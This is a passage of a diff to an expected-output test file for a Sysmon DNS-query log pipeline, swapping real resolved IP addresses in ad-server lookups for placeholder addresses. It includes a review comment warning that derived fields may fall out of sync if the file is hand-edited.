@@ -1392,7 +1392,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:18.204.130.216;::ffff:18.209.246.43;::ffff:107.23.153.61;::ffff:18.235.141.27;::ffff:3.210.79.248;::ffff:18.209.146.43;::ffff:18.210.64.206;::ffff:18.214.161.226;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -1416,7 +1416,7 @@
 "ProcessId": "2736",
 "QueryName": "protected-by.clarium.io",
 "QueryStatus": "0",
- "QueryResults": "type: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:18.204.130.216;::ffff:18.209.246.43;::ffff:107.23.153.61;::ffff:18.235.141.27;::ffff:3.210.79.248;::ffff:18.209.146.43;::ffff:18.210.64.206;::ffff:18.214.161.226;192.5.6.30;2001:503:a83e::2:30;",
+ "QueryResults": "type: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "process": {
@@ -1434,7 +1434,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1459,7 +1459,7 @@ "ProcessId": "2736", "QueryName": "pagead2.googlesyndication.com", "QueryStatus": "0", - "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;", + "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -1479,7 +1479,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "process": { @@ -1508,7 +1508,7 @@ "ProcessId": "2736", "QueryName": "googleads.g.doubleclick.net", "QueryStatus": "0", - "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;" + "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;" } } }, 
@@ -1518,7 +1518,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:52.22.184.73;::ffff:54.152.30.174;::ffff:3.213.70.197;::ffff:54.158.57.141;::ffff:52.6.39.34;::ffff:52.0.113.251;::ffff:3.213.8.28;::ffff:3.215.246.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -1534,7 +1534,7 @@
 "ProcessId": "2736",
 "QueryName": "pixel.advertising.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:52.22.184.73;::ffff:54.152.30.174;::ffff:3.213.70.197;::ffff:54.158.57.141;::ffff:52.6.39.34;::ffff:52.0.113.251;::ffff:3.213.8.28;::ffff:3.215.246.105;",
+ "QueryResults": "type: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:02.841"
 },
@@ -1560,7 +1560,7 @@
 "event_data": {
 "QueryName": "onevideosync.uplynk.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:54.210.214.197;::ffff:52.202.202.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;",
+ "QueryResults": "type: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:02.844",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
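Review bot: Only `event.original` and `winlog.event_data.QueryResults` change in the hunks visible here, yet a Sysmon event-22 pipeline normally derives further fields from `QueryResults` (resolved and related IPs), and whether those expected values elsewhere in this file changed in lockstep is not visible from these hunks. If this expected file was updated by search-and-replace rather than regenerated from the pipeline, the derived fields will be out of sync with the new `QueryResults` strings and the pipeline test will fail on them rather than on the IP change itself. Regenerating the expected output with the package's pipeline test generator, instead of hand-editing, is the safer way to keep raw and derived values consistent.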
@@ -1589,7 +1589,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:54.210.214.197;::ffff:52.202.202.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "log": { 
@@ -1642,7 +1642,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:50.116.194.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", @@ -1660,7 +1660,7 @@ "ProcessId": "2736", "QueryName": "ad.turn.com", "QueryStatus": "0", - "QueryResults": "type: 5 ad.turn.com.akadns.net;::ffff:50.116.194.21;", + "QueryResults": "type: 5 ad.turn.com.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.956", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -1683,7 +1683,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:34.225.20.218;::ffff:3.216.14.125;::ffff:52.200.28.150;::ffff:3.216.103.132;::ffff:52.4.86.222;::ffff:52.21.200.160;::ffff:3.216.249.238;::ffff:3.94.175.146;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent 